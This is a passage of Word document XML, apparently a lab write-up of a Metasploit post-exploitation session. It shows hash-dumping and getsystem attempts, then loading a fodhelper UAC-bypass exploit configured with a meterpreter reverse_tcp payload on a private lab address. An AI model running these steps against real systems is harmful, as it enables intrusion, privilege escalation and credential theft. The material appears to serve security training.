                <v:shape id="Shape 11614" o:spid="_x0000_s1028" style="position:absolute;top:1752;width:426;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="42672,1752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daIsIA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2sCMRC+F/wPYYTeanaliGyNIlKh6Kk+8Dpspsnq&#10;ZrIk6br9902h4G0+vucsVoNrRU8hNp4VlJMCBHHtdcNGwem4fZmDiAlZY+uZFPxQhNVy9LTASvs7&#10;f1J/SEbkEI4VKrApdZWUsbbkME58R5y5Lx8cpgyDkTrgPYe7Vk6LYiYdNpwbLHa0sVTfDt9OQfO+&#10;NXp3ubZ47MNuv7fTs3FOqefxsH4DkWhID/G/+0Pn+eWsfIW/d/IN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l1oiwgAAAN4AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m,l42672,r,175261l,175261,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,42672,175261"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; run post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>smart_hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[-] Insufficient privileges to dump hashes! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -t 1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[-] 2001: Operation failed: Access is denied. The following was attempted: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[-] Named Pipe Impersonation (In Memory/Admin) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; background  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Backgrounding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> session 1... </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="32" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="244" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="-15" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Escalate!!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; use exploit/windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bypassuac_fodhelper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="1070" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[*] No payload configured, defaulting to windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>exploit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>bypassuac_fodhelper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; show options </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Module options (exploit/windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bypassuac_fodhelper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Name     Current </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Setting  Required</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  Description </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">----     ---------------  --------  ----------- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SESSION                   yes       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> session to run this module on. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Payload options (windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Name      Current </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Setting  Required</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  Description </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">----      ---------------  --------  ----------- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>EXITFUNC  process</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          yes       Exit technique (Accepted: '', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>seh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, thread, process, none) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST     10.0.2.15        yes       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> listen address (an interface may be specified) LPORT     4444             yes       The listen port </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit target: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Id  Name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   --  ---- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   0   Windows x86 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="643"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit(windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bypassuac_fodhelper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) &gt; set SESSION 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">SESSION =&gt; 1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="2069" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>19203</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4645152" cy="350520"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="9855" name="Group 9855"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4645152" cy="350520"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4645152" cy="350520"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="11615" name="Shape 11615"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4645152" cy="175260"/>
                          </a:xfrm>
